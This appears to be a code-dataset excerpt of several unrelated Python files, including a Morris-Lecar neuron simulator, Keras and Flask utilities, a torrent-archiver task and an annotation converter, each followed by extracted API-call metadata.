"""
def __init__(self, C=20, VL=-60, VCa=120, VK=-84, gL=2, gCa=4, gK=8,
V1=-1.2, V2=18, V3=12, V4=17.4, phi=0.06):
"""
Initializes the model.
Args:
C (int, float): Capacitance of the membrane.
VL (int, float): Potential L.
VCa (int, float): Potential Ca.
VK (int, float): Potential K.
gL (int, float): Conductance L.
gCa (int, float): Conductance Ca.
gK (int, float): Conductance K.
V1 (int, float): Potential at which Mss converges.
V2 (int, float): Reciprocal of slope of Mss.
V3 (int, float): Potential at which Nss converges.
V4 (int, float): Reciprocal of slope of Nss.
phi (int, float): Time scale recovery.
"""
self.C = C
self.VL = VL
self.VCa = VCa
self.VK = VK
self.gL = gL
self.gCa = gCa
self.gK = gK
self.V1 = V1
self.V2 = V2
self.V3 = V3
self.V4 = V4
self.phi = phi
self.t = None
self.dt = None
self.tvec = None
self.V = None
self.N = None
def __repr__(self):
"""
Visualize model parameters when printing.
"""
return (f'MorrisLecar(C={self.C}, VL={self.VL}, VCa={self.VCa}, VK={self.VK}, '
f'gL={self.gL}, gCa={self.gCa}, gK={self.gK}, V1={self.V1}, V2={self.V2}, '
f'V3={self.V3}, V4={self.V4}, phi={self.phi})')
def _system_equations(self, X, t, current):
"""
Defines the equations of the dynamical system for integration.
"""
Mss = (1 + np.tanh((X[0] - self.V1) / self.V2)) / 2
Nss = (1 + np.tanh((X[0] - self.V3) / self.V4)) / 2
tau = 1 / self.phi * (np.cosh((X[0] - self.V3) / (2 * self.V4)))
return [(1 / self.C) * (current - self.gL * (X[0] - self.VL) - self.gCa * Mss * (X[0] - self.VCa) - self.gK * X[1] * (X[0] - self.VK)),
(Nss - X[1]) / tau]
def run(self, X0=[0, 0], current=1, t=100, dt=0.01):
"""
Runs the model.
Args:
X0 (list, optional): Initial values of V and N. Defaults to [0, 0].
current (int, optional): External current. Defaults to 1.
t (int, optional): Total time for the simulation. Defaults to 100.
dt (float, optional): Simulation step. Defaults to 0.01.
"""
self.current = current
self.t = t
self.dt = dt
self.tvec = np.arange(0, self.t, self.dt)
X = odeint(self._system_equations, X0, self.tvec, (current,))
self.V, self.N = X[:, 0], X[:, 1]
| [
"scipy.integrate.odeint",
"numpy.tanh",
"numpy.cosh",
"numpy.arange"
] | [((2678, 2707), 'numpy.arange', 'np.arange', (['(0)', 'self.t', 'self.dt'], {}), '(0, self.t, self.dt)\n', (2687, 2707), True, 'import numpy as np\n'), ((2720, 2777), 'scipy.integrate.odeint', 'odeint', (['self._system_equations', 'X0', 'self.tvec', '(current,)'], {}), '(self._system_equations, X0, self.tvec, (current,))\n', (2726, 2777), False, 'from scipy.integrate import odeint\n'), ((1944, 1985), 'numpy.cosh', 'np.cosh', (['((X[0] - self.V3) / (2 * self.V4))'], {}), '((X[0] - self.V3) / (2 * self.V4))\n', (1951, 1985), True, 'import numpy as np\n'), ((1813, 1848), 'numpy.tanh', 'np.tanh', (['((X[0] - self.V1) / self.V2)'], {}), '((X[0] - self.V1) / self.V2)\n', (1820, 1848), True, 'import numpy as np\n'), ((1873, 1908), 'numpy.tanh', 'np.tanh', (['((X[0] - self.V3) / self.V4)'], {}), '((X[0] - self.V3) / self.V4)\n', (1880, 1908), True, 'import numpy as np\n')] |
"""Abstract Base Class for Keras Models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import tensorflow as tf
from keras import models
from tf_trainer.common import types
from tf_trainer.common import base_model
class BaseKerasModel(base_model.BaseModel):
"""Abstract Base Class for Keras Models.
Interface for Keras models.
"""
TMP_MODEL_DIR = '/tmp/keras_model'
@abc.abstractmethod
def _get_keras_model(self) -> models.Model:
"""Compiled Keras model.
Inputs should be word embeddings.
"""
pass
def estimator(self, model_dir):
"""Estimator created based on this instances Keras model.
The generated estimator expected a tokenized text input (i.e. a sequence of
words), and is responsible for generating the embedding with the provided
preprocessor).
"""
keras_model = self._get_keras_model()
# IMPORTANT: model_to_estimator creates a checkpoint, however this checkpoint
# does not contain the embedding variable (or other variables that we might
# want to add outside of the Keras model). The workaround is to specify a
# model_dir that is *not* the actual model_dir of the final model.
estimator = tf.keras.estimator.model_to_estimator(
keras_model=keras_model, model_dir=BaseKerasModel.TMP_MODEL_DIR)
new_config = estimator.config.replace(model_dir=model_dir)
# Why does estimator.model_fn not include params...
def new_model_fn(features, labels, mode, params, config):
return estimator.model_fn(features, labels, mode, config)
return tf.estimator.Estimator(
new_model_fn, config=new_config, params=estimator.params)
@staticmethod
def roc_auc(y_true: types.Tensor, y_pred: types.Tensor,
threshold=0.5) -> types.Tensor:
"""ROC AUC based on TF's metrics package. This provides AUC in a Keras
metrics compatible way (Keras doesn't have AUC otherwise).
We assume true labels are 'soft' and pick 0 or 1 based on a threshold.
"""
y_bool_true = tf.greater(y_true, threshold)
value, update_op = tf.metrics.auc(y_bool_true, y_pred)
return update_op
| [
"tensorflow.metrics.auc",
"tensorflow.keras.estimator.model_to_estimator",
"tensorflow.estimator.Estimator",
"tensorflow.greater"
] | [((1264, 1371), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'keras_model', 'model_dir': 'BaseKerasModel.TMP_MODEL_DIR'}), '(keras_model=keras_model, model_dir=\n BaseKerasModel.TMP_MODEL_DIR)\n', (1301, 1371), True, 'import tensorflow as tf\n'), ((1635, 1720), 'tensorflow.estimator.Estimator', 'tf.estimator.Estimator', (['new_model_fn'], {'config': 'new_config', 'params': 'estimator.params'}), '(new_model_fn, config=new_config, params=estimator.params\n )\n', (1657, 1720), True, 'import tensorflow as tf\n'), ((2086, 2115), 'tensorflow.greater', 'tf.greater', (['y_true', 'threshold'], {}), '(y_true, threshold)\n', (2096, 2115), True, 'import tensorflow as tf\n'), ((2139, 2174), 'tensorflow.metrics.auc', 'tf.metrics.auc', (['y_bool_true', 'y_pred'], {}), '(y_bool_true, y_pred)\n', (2153, 2174), True, 'import tensorflow as tf\n')] |
import game.shared.gamecontants as gameconstants
from game.casting.cast import Cast
from game.casting.cycle import Cycle
from game.directing.director import Director
from game.services.keyboard_service import KeyboardService
from game.services.display_service import DisplayService
from game.shared.color import Color
from game.shared.point import Point
def main():
# create the cast
cast = Cast()
""" NEEDS TO BE UPDATED """
"""
# create the banner
banner = Actor()
banner.set_text("")
banner.set_font_size(gameconstants.FONT_SIZE)
banner.set_color(gameconstants.WHITE)
banner.set_position(Point(gameconstants.CELL_SIZE, 0))
cast.add_actor("banners", banner)
"""
position = Point(int(gameconstants.COLS / 3), int(gameconstants.ROWS / 2)) #just a facy way of positioning proportionally to the screen size
position = position.scale(gameconstants.CELL_SIZE)
cycle1 = Cycle(position, 1)
cycle1.set_velocity(Point(0, 0))
cycle1.set_color(Color(50, 125, 200))
cast.add_actor("cycle1", cycle1)
position = Point(int(gameconstants.COLS / 3 * 2), int(gameconstants.ROWS / 2))
position = position.scale(gameconstants.CELL_SIZE)
cycle2 = Cycle(position, 3)
cycle2.set_velocity(Point(0, 0))
cycle2.set_color(Color(0, 0, 200))
cast.add_actor("cycle2", cycle2)
# start the game
keyboard_service = KeyboardService()
display_service = DisplayService(
gameconstants.CAPTION.format(gameconstants.CENTER),
gameconstants.MAX_X,
gameconstants.MAX_Y,
gameconstants.CELL_SIZE,
gameconstants.FRAME_RATE
)
director = Director(keyboard_service, display_service)
director.start_game(cast)
if __name__ == "__main__":
main()
| [
"game.shared.point.Point",
"game.casting.cycle.Cycle",
"game.shared.gamecontants.CAPTION.format",
"game.casting.cast.Cast",
"game.services.keyboard_service.KeyboardService",
"game.directing.director.Director",
"game.shared.color.Color"
] | [((405, 411), 'game.casting.cast.Cast', 'Cast', ([], {}), '()\n', (409, 411), False, 'from game.casting.cast import Cast\n'), ((933, 951), 'game.casting.cycle.Cycle', 'Cycle', (['position', '(1)'], {}), '(position, 1)\n', (938, 951), False, 'from game.casting.cycle import Cycle\n'), ((1221, 1239), 'game.casting.cycle.Cycle', 'Cycle', (['position', '(3)'], {}), '(position, 3)\n', (1226, 1239), False, 'from game.casting.cycle import Cycle\n'), ((1398, 1415), 'game.services.keyboard_service.KeyboardService', 'KeyboardService', ([], {}), '()\n', (1413, 1415), False, 'from game.services.keyboard_service import KeyboardService\n'), ((1663, 1706), 'game.directing.director.Director', 'Director', (['keyboard_service', 'display_service'], {}), '(keyboard_service, display_service)\n', (1671, 1706), False, 'from game.directing.director import Director\n'), ((976, 987), 'game.shared.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (981, 987), False, 'from game.shared.point import Point\n'), ((1010, 1029), 'game.shared.color.Color', 'Color', (['(50)', '(125)', '(200)'], {}), '(50, 125, 200)\n', (1015, 1029), False, 'from game.shared.color import Color\n'), ((1264, 1275), 'game.shared.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1269, 1275), False, 'from game.shared.point import Point\n'), ((1298, 1314), 'game.shared.color.Color', 'Color', (['(0)', '(0)', '(200)'], {}), '(0, 0, 200)\n', (1303, 1314), False, 'from game.shared.color import Color\n'), ((1462, 1512), 'game.shared.gamecontants.CAPTION.format', 'gameconstants.CAPTION.format', (['gameconstants.CENTER'], {}), '(gameconstants.CENTER)\n', (1490, 1512), True, 'import game.shared.gamecontants as gameconstants\n')] |
import logging
import numpy as np
from .transformer import Transformer, FFTTransformer
logger = logging.getLogger(__name__)
class MapScaler:
def __init__(self, xmap, scattering='xray'):
self.xmap = xmap
self.scattering = scattering
self._model_map = xmap.zeros_like(xmap)
def subtract(self, structure):
if self.xmap.hkl is not None:
hkl = self.xmap.hkl
transformer = FFTTransformer(
structure, self._model_map, hkl=hkl, scattering=self.scattering)
else:
transformer = Transformer(
structure, self._model_map, simple=True,
rmax=3, scattering=self.scattering)
logger.info("Subtracting density.")
transformer.density()
self.xmap.array -= self._model_map.array
def scale(self, structure, radius=1):
if self.xmap.hkl is not None:
hkl = self.xmap.hkl
transformer = FFTTransformer(structure, self._model_map,
hkl=hkl, scattering=self.scattering)
else:
transformer = Transformer(structure, self._model_map, simple=True,
rmax=3, scattering=self.scattering)
# Get all map coordinates of interest:
transformer.mask(radius)
mask = self._model_map.array > 0
# Calculate map based on structure:
transformer.reset(full=True)
transformer.density()
# Get all map values of interest
xmap_masked = self.xmap.array[mask]
model_masked = self._model_map.array[mask]
# Get the mean of masked observed and masked calculated map values
xmap_masked_mean = xmap_masked.mean()
model_masked_mean = model_masked.mean()
# Get optimal scaling factor and mean-difference.
xmap_masked -= xmap_masked_mean
model_masked -= model_masked_mean
s2 = np.dot(model_masked, xmap_masked)
s1 = np.dot(xmap_masked, xmap_masked)
scaling_factor = s2 / s1
k = model_masked_mean - scaling_factor * xmap_masked_mean
logger.info(f"L2 scaling: S = {scaling_factor:.2f}\tk = {k:.2f}")
# Scale the observed map to the calculated map
self.xmap.array = scaling_factor * self.xmap.array + k
transformer.reset(full=True)
def cutoff(self, cutoff_value, value=-1):
cutoff_mask = self.xmap.array < cutoff_value
self.xmap.array[cutoff_mask] = value
logger.info(f"Map absolute cutoff value: {cutoff_value:.2f}")
| [
"logging.getLogger",
"numpy.dot"
] | [((99, 126), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (116, 126), False, 'import logging\n'), ((1942, 1975), 'numpy.dot', 'np.dot', (['model_masked', 'xmap_masked'], {}), '(model_masked, xmap_masked)\n', (1948, 1975), True, 'import numpy as np\n'), ((1989, 2021), 'numpy.dot', 'np.dot', (['xmap_masked', 'xmap_masked'], {}), '(xmap_masked, xmap_masked)\n', (1995, 2021), True, 'import numpy as np\n')] |
import time
from django.conf import settings
from Harvest.utils import get_logger
from monitoring.decorators import update_component_status
from monitoring.models import ComponentStatus
from plugins.bibliotik.client import BibliotikClient
from plugins.bibliotik.exceptions import BibliotikTorrentNotFoundException
from plugins.bibliotik.html_parser import parse_search_results
from plugins.bibliotik.tracker import BibliotikTrackerPlugin
from plugins.bibliotik_archiver.models import BibliotikArchiverState
from plugins.bibliotik_archiver.utils import get_bibliotik_torrent_for_archiving
from task_queue.task_queue import TaskQueue
from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker
from torrents.models import Realm
from trackers.registry import TrackerRegistry
logger = get_logger(__name__)
@TaskQueue.periodic_task(settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL)
@update_component_status(
'bibliotik_archiver_metadata',
error_message='Bibliotik archiver metadata crashed.',
)
def bibliotik_archiver_metadata():
start = time.time()
state = BibliotikArchiverState.objects.get()
if not state.is_metadata_enabled:
return
client = BibliotikClient()
tracker = TrackerRegistry.get_plugin(BibliotikTrackerPlugin.name, 'bibliotik_archiver_metadata')
realm = Realm.objects.get(name=tracker.name)
search_results = parse_search_results(client.search(''))
max_tracker_id = search_results[0]['tracker_id']
logger.info('Bibliotik max tracker id: {}.', max_tracker_id)
num_scraped = 0
# last_meta_tracker_id was the last one processed, so resume from the next.
for tracker_id in range(state.last_meta_tracker_id + 1, max_tracker_id + 1):
try:
fetch_torrent(realm, tracker, tracker_id)
logger.info('Bibliotik torrent {} fetched.', tracker_id)
except BibliotikTorrentNotFoundException:
logger.info('Bibliotik torrent {} not found.', tracker_id)
state.last_meta_tracker_id = tracker_id
state.save(update_fields=('last_meta_tracker_id',))
num_scraped += 1
allowed_time = (
settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL -
settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP -
4
)
if time.time() - start >= allowed_time:
break
time.sleep(settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP)
time_taken = time.time() - start
ComponentStatus.update_status(
'bibliotik_archiver_metadata',
ComponentStatus.STATUS_GREEN,
'Completed Bibliotik archiver metadata run with {} torrents in {:.3f} s. Progress: {} / {}.'.format(
num_scraped, time_taken, state.last_meta_tracker_id, max_tracker_id),
)
@TaskQueue.periodic_task(settings.BIBLIOTIK_ARCHIVER_DOWNLOAD_INTERVAL)
@update_component_status(
'bibliotik_archiver_download',
error_message='Bibliotik archiver download torrent crashed.',
)
def bibliotik_archiver_download_torrent():
start = time.time()
state = BibliotikArchiverState.objects.get()
if not state.is_download_enabled:
return
bibliotik_torrent, num_remaining = get_bibliotik_torrent_for_archiving()
if not bibliotik_torrent:
logger.info('Bibliotik torrent download - nothing to download.')
return
tracker = TrackerRegistry.get_plugin('bibliotik', 'bibliotik_archive_download_torrent')
realm = Realm.objects.get(name=tracker.name)
download_location = realm.get_preferred_download_location()
if not download_location:
logger.error('No download location for realm {}.', tracker.name)
return
tracker_id = bibliotik_torrent.torrent_info.tracker_id
torrent_info = fetch_torrent(realm, tracker, tracker_id)
if torrent_info.is_deleted:
logger.info('Bibliotik torrent {} already deleted.', tracker_id)
return
logger.info('Downloading Bibliotik torrent {}.', tracker_id)
add_torrent_from_tracker(
tracker=tracker,
tracker_id=tracker_id,
download_path_pattern=download_location.pattern,
force_fetch=False,
)
time_taken = time.time() - start
ComponentStatus.update_status(
'bibliotik_archiver_download',
ComponentStatus.STATUS_GREEN,
'Completed Bibliotik archiver download torrent run in {:.3f} s. Remaining: {}.'.format(
time_taken, num_remaining - 1),
)
| [
"plugins.bibliotik_archiver.utils.get_bibliotik_torrent_for_archiving",
"torrents.add_torrent.add_torrent_from_tracker",
"torrents.models.Realm.objects.get",
"plugins.bibliotik_archiver.models.BibliotikArchiverState.objects.get",
"task_queue.task_queue.TaskQueue.periodic_task",
"monitoring.decorators.upda... | [((797, 817), 'Harvest.utils.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (807, 817), False, 'from Harvest.utils import get_logger\n'), ((821, 891), 'task_queue.task_queue.TaskQueue.periodic_task', 'TaskQueue.periodic_task', (['settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL'], {}), '(settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL)\n', (844, 891), False, 'from task_queue.task_queue import TaskQueue\n'), ((893, 1006), 'monitoring.decorators.update_component_status', 'update_component_status', (['"""bibliotik_archiver_metadata"""'], {'error_message': '"""Bibliotik archiver metadata crashed."""'}), "('bibliotik_archiver_metadata', error_message=\n 'Bibliotik archiver metadata crashed.')\n", (916, 1006), False, 'from monitoring.decorators import update_component_status\n'), ((2767, 2837), 'task_queue.task_queue.TaskQueue.periodic_task', 'TaskQueue.periodic_task', (['settings.BIBLIOTIK_ARCHIVER_DOWNLOAD_INTERVAL'], {}), '(settings.BIBLIOTIK_ARCHIVER_DOWNLOAD_INTERVAL)\n', (2790, 2837), False, 'from task_queue.task_queue import TaskQueue\n'), ((2839, 2960), 'monitoring.decorators.update_component_status', 'update_component_status', (['"""bibliotik_archiver_download"""'], {'error_message': '"""Bibliotik archiver download torrent crashed."""'}), "('bibliotik_archiver_download', error_message=\n 'Bibliotik archiver download torrent crashed.')\n", (2862, 2960), False, 'from monitoring.decorators import update_component_status\n'), ((1060, 1071), 'time.time', 'time.time', ([], {}), '()\n', (1069, 1071), False, 'import time\n'), ((1085, 1121), 'plugins.bibliotik_archiver.models.BibliotikArchiverState.objects.get', 'BibliotikArchiverState.objects.get', ([], {}), '()\n', (1119, 1121), False, 'from plugins.bibliotik_archiver.models import BibliotikArchiverState\n'), ((1189, 1206), 'plugins.bibliotik.client.BibliotikClient', 'BibliotikClient', ([], {}), '()\n', (1204, 1206), False, 'from plugins.bibliotik.client import BibliotikClient\n'), ((1221, 1311), 'trackers.registry.TrackerRegistry.get_plugin', 'TrackerRegistry.get_plugin', (['BibliotikTrackerPlugin.name', '"""bibliotik_archiver_metadata"""'], {}), "(BibliotikTrackerPlugin.name,\n 'bibliotik_archiver_metadata')\n", (1247, 1311), False, 'from trackers.registry import TrackerRegistry\n'), ((1320, 1356), 'torrents.models.Realm.objects.get', 'Realm.objects.get', ([], {'name': 'tracker.name'}), '(name=tracker.name)\n', (1337, 1356), False, 'from torrents.models import Realm\n'), ((3022, 3033), 'time.time', 'time.time', ([], {}), '()\n', (3031, 3033), False, 'import time\n'), ((3047, 3083), 'plugins.bibliotik_archiver.models.BibliotikArchiverState.objects.get', 'BibliotikArchiverState.objects.get', ([], {}), '()\n', (3081, 3083), False, 'from plugins.bibliotik_archiver.models import BibliotikArchiverState\n'), ((3177, 3214), 'plugins.bibliotik_archiver.utils.get_bibliotik_torrent_for_archiving', 'get_bibliotik_torrent_for_archiving', ([], {}), '()\n', (3212, 3214), False, 'from plugins.bibliotik_archiver.utils import get_bibliotik_torrent_for_archiving\n'), ((3349, 3426), 'trackers.registry.TrackerRegistry.get_plugin', 'TrackerRegistry.get_plugin', (['"""bibliotik"""', '"""bibliotik_archive_download_torrent"""'], {}), "('bibliotik', 'bibliotik_archive_download_torrent')\n", (3375, 3426), False, 'from trackers.registry import TrackerRegistry\n'), ((3439, 3475), 'torrents.models.Realm.objects.get', 'Realm.objects.get', ([], {'name': 'tracker.name'}), '(name=tracker.name)\n', (3456, 3475), False, 'from torrents.models import Realm\n'), ((3738, 3779), 'torrents.add_torrent.fetch_torrent', 'fetch_torrent', (['realm', 'tracker', 'tracker_id'], {}), '(realm, tracker, tracker_id)\n', (3751, 3779), False, 'from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker\n'), ((3970, 4106), 'torrents.add_torrent.add_torrent_from_tracker', 'add_torrent_from_tracker', ([], {'tracker': 'tracker', 'tracker_id': 'tracker_id', 'download_path_pattern': 'download_location.pattern', 'force_fetch': '(False)'}), '(tracker=tracker, tracker_id=tracker_id,\n download_path_pattern=download_location.pattern, force_fetch=False)\n', (3994, 4106), False, 'from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker\n'), ((2362, 2416), 'time.sleep', 'time.sleep', (['settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP'], {}), '(settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP)\n', (2372, 2416), False, 'import time\n'), ((2435, 2446), 'time.time', 'time.time', ([], {}), '()\n', (2444, 2446), False, 'import time\n'), ((4160, 4171), 'time.time', 'time.time', ([], {}), '()\n', (4169, 4171), False, 'import time\n'), ((1744, 1785), 'torrents.add_torrent.fetch_torrent', 'fetch_torrent', (['realm', 'tracker', 'tracker_id'], {}), '(realm, tracker, tracker_id)\n', (1757, 1785), False, 'from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker\n'), ((2299, 2310), 'time.time', 'time.time', ([], {}), '()\n', (2308, 2310), False, 'import time\n')] |
from flask import request,json
from werkzeug.exceptions import HTTPException
class ApiException(HTTPException):
code = 500
error_code = 500
msg = 'sorry, made a mistake'
def __init__(self,code=None, error_code=None, msg=None, header=None):
if code:
self.code = code
if msg:
self.msg = msg
if error_code:
self.error_code = error_code
super(ApiException,self).__init__(msg,None)
def get_body(self, environ=None):
body=dict(
msg=self.msg,
error_code = self.error_code,
request=request.method + ' ' + self.get_url_no_param()
)
text = json.dumps(body)
return text
def get_headers(self, environ=None):
return [('Content-Type','application/json')]
@staticmethod
def get_url_no_param():
full_url = str(request.full_path)
main_path = full_url.split('?')
return main_path[0]
class ParameterException(ApiException):
code = 400
error_code = 400
msg = 'invalid parameter'
class BadRequest(ApiException):
"""*400* `Bad Request`
Raise if the browser sends something to the application the application
or server cannot handle.
"""
code = 400
error_code = 400
msg = 'The browser (or proxy) sent a request that this server could not understand.'
class Success(ApiException):
code = 200
msg = 'success'
class ClientDisconnected(BadRequest):
"""Internal exception that is raised if Werkzeug detects a disconnected
client. Since the client is already gone at that point attempting to
send the error message to the client might not work and might ultimately
result in another exception in the server. Mainly this is here so that
it is silenced by default as far as Werkzeug is concerned.
Since disconnections cannot be reliably detected and are unspecified
by WSGI to a large extent this might or might not be raised if a client
is gone.
.. versionadded:: 0.8
"""
class SecurityError(BadRequest):
"""Raised if something triggers a security error. This is otherwise
exactly like a bad request error.
.. versionadded:: 0.9
"""
class BadHost(BadRequest):
"""Raised if the submitted host is badly formatted.
.. versionadded:: 0.11.2
"""
class Unauthorized(ApiException):
"""*401* `Unauthorized`
Raise if the user is not authorized. Also used if you want to use HTTP
basic auth.
"""
code = 401
error_code = 401
msg = (
'The server could not verify that you are authorized to access '
'the URL requested. You either supplied the wrong credentials (e.g. '
'a bad password), or your browser doesn\'t understand how to supply '
'the credentials required.'
)
class Forbidden(ApiException):
"""*403* `Forbidden`
Raise if the user doesn't have the permission for the requested resource
but was authenticated.
"""
code = 403
error_code = 403
msg = (
'You don\'t have the permission to access the requested resource. '
'It is either read-protected or not readable by the server.'
)
class NotFound(ApiException):
"""*404* `Not Found`
Raise if a resource does not exist and never existed.
"""
code = 404
error_code = 404
msg = (
'The requested URL was not found on the server. '
'If you entered the URL manually please check your spelling and '
'try again.'
)
class MethodNotAllowed(ApiException):
"""*405* `Method Not Allowed`
Raise if the server used a method the resource does not handle. For
example `POST` if the resource is view only. Especially useful for REST.
The first argument for this exception should be a list of allowed methods.
Strictly speaking the response would be invalid if you don't provide valid
methods in the header which you can do with that list.
"""
code = 405
error_code = 405
msg = 'The method is not allowed for the requested URL.'
def __init__(self, valid_methods=None, msg=None):
"""Takes an optional list of valid http methods
starting with werkzeug 0.3 the list will be mandatory."""
ApiException.__init__(self, msg)
self.valid_methods = valid_methods
def get_headers(self, environ):
headers = ApiException.get_headers(self, environ)
if self.valid_methods:
headers.append(('Allow', ', '.join(self.valid_methods)))
return headers
class NotAcceptable(ApiException):
"""*406* `Not Acceptable`
Raise if the server can't return any content conforming to the
`Accept` headers of the client.
"""
code = 406
error_code = 406
msg = (
'The resource identified by the request is only capable of '
'generating response entities which have content characteristics '
'not acceptable according to the accept headers sent in the '
'request.'
)
class RequestTimeout(ApiException):
"""*408* `Request Timeout`
Raise to signalize a timeout.
"""
code = 408
error_code = 408
msg = (
'The server closed the network connection because the browser '
'didn\'t finish the request within the specified time.'
)
class UnsupportedMediaType(ApiException):
"""*415* `Unsupported Media Type`
The status code returned if the server is unable to handle the media type
the client transmitted.
"""
code = 415
error_code = 415
description = (
'The server does not support the media type transmitted in '
'the request.'
)
class InternalServerError(ApiException):
"""*500* `Internal Server Error`
Raise if an internal server error occurred. This is a good fallback if an
unknown error occurred in the dispatcher.
"""
code = 500
error_code = 500
description = (
'The server encountered an internal error and was unable to '
'complete your request. Either the server is overloaded or there '
'is an error in the application.'
) | [
"flask.json.dumps"
] | [((682, 698), 'flask.json.dumps', 'json.dumps', (['body'], {}), '(body)\n', (692, 698), False, 'from flask import request, json\n')] |
from robot.thymio_robot import ThymioII
from robot.vrep_robot import VrepRobot
from aseba.aseba import Aseba
from utility.util_functions import normalize
import numpy as np
T_SEN_MIN = 0
T_SEN_MAX = 4500
class EvolvedRobot(VrepRobot, ThymioII):
def __init__(self, name, client_id, id, op_mode, chromosome, robot_type):
VrepRobot.__init__(self, client_id, id, op_mode, robot_type)
ThymioII.__init__(self, name)
self.chromosome = chromosome
self.n_t_sensor_activation = np.array([])
self.t_sensor_activation = np.array([])
def t_read_prox(self):
self.t_sensor_activation = np.array(
super(EvolvedRobot, self).t_read_prox())
self.n_t_sensor_activation = np.array(
[normalize(xi, T_SEN_MIN, T_SEN_MAX, 0.0, 1.0) for xi in self.t_sensor_activation])
return self.n_t_sensor_activation
| [
"numpy.array",
"robot.vrep_robot.VrepRobot.__init__",
"utility.util_functions.normalize",
"robot.thymio_robot.ThymioII.__init__"
] | [((335, 395), 'robot.vrep_robot.VrepRobot.__init__', 'VrepRobot.__init__', (['self', 'client_id', 'id', 'op_mode', 'robot_type'], {}), '(self, client_id, id, op_mode, robot_type)\n', (353, 395), False, 'from robot.vrep_robot import VrepRobot\n'), ((404, 433), 'robot.thymio_robot.ThymioII.__init__', 'ThymioII.__init__', (['self', 'name'], {}), '(self, name)\n', (421, 433), False, 'from robot.thymio_robot import ThymioII\n'), ((509, 521), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (517, 521), True, 'import numpy as np\n'), ((557, 569), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (565, 569), True, 'import numpy as np\n'), ((756, 801), 'utility.util_functions.normalize', 'normalize', (['xi', 'T_SEN_MIN', 'T_SEN_MAX', '(0.0)', '(1.0)'], {}), '(xi, T_SEN_MIN, T_SEN_MAX, 0.0, 1.0)\n', (765, 801), False, 'from utility.util_functions import normalize\n')] |
import argparse
import json
import os
try:
import cv2
def get_image_dims(im_file):
im = cv2.imread(im_file,0)
im_h, im_w = im.shape
return im_h, im_w
Exception.Modu
except ModuleNotFoundError as e:
from PIL import Image
def get_image_dims(im_file):
im = Image.open(im_file)
im_w, im_h = im.size
return im_h, im_w
except ModuleNotFoundError as e:
raise Exception("Either install opencv-python or PIL")
def main(data_path="", image_data_path = ""):
meta_json_path = os.path.join(data_path,"meta.json")
if not os.path.isfile(meta_json_path):
raise Exception(meta_json_path + " not found.")
# Create .data file
with open(meta_json_path) as f:
classes = json.loads(f.read())
titles = [lis["title"] for lis in classes["classes"]]
dic_titles = dict(zip(titles, range(len(titles))))
names = "\n".join(dic_titles.keys())
meta_names_path = os.path.join(data_path,"meta.names")
with open(meta_names_path, "w") as text_file:
text_file.write(names)
# Convert all spaces
data_path = image_data_path
images_path = os.path.join(data_path,"images")
anno_path = os.path.join(data_path,"annotations")
darknet_path = os.path.join(data_path,"annotations_darknet")
if not os.path.isdir(darknet_path): os.mkdir(darknet_path)
anno_paths = os.listdir(anno_path)
anno_paths = [path for path in anno_paths if path.endswith(".json")]
for ap in anno_paths:
with open(os.path.join(anno_path,ap)) as f:
tmp_dict = json.loads(f.read())
im_file = tmp_dict["FileName"]
rel_path = os.path.join(images_path,im_file)
if not os.path.isfile(rel_path):
print("Image file not found for " + rel_path)
continue
im_h, im_w = get_image_dims(rel_path)
num_anno = tmp_dict["NumOfAnno"]
if num_anno < 1: continue
annotations = tmp_dict["Annotations"]
anno_str = ""
for json_anno in annotations:
classname = json_anno["classname"]
classnum = str(dic_titles[classname])
xmin, ymin, xmax, ymax = json_anno["BoundingBox"]
x_cen = ((xmax + xmin)/2) / im_w
y_cen = ((ymax + ymin)/2) / im_h
w = (xmax - xmin) / im_w
h = (ymax - ymin) / im_h
anno_str += classnum + " {:.4f} {:.4f} {:.4f} {:.4f}\n".format(x_cen, y_cen, w, h)
darknet_anno = ap.split(".")[0]+".txt"
with open(os.path.join(darknet_path, darknet_anno),"w") as f:
f.write(anno_str)
print(f"Converting: {ap} -> {darknet_anno}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Convert Supervisely format to Darknet-Yolo format')
parser.add_argument('-mp','--meta_path', dest="data_path", default="", metavar="path", type=str,
help='full or relative path to folder containing meta.json')
parser.add_argument('-ip','--image_path', dest="image_data_path", default="", metavar="path", type=str,
help='full or relative path to folder containing annotations and images')
args = parser.parse_args()
main(data_path=args.data_path, image_data_path=args.image_data_path) | [
"os.listdir",
"PIL.Image.open",
"argparse.ArgumentParser",
"os.path.join",
"os.path.isfile",
"os.path.isdir",
"os.mkdir",
"cv2.imread"
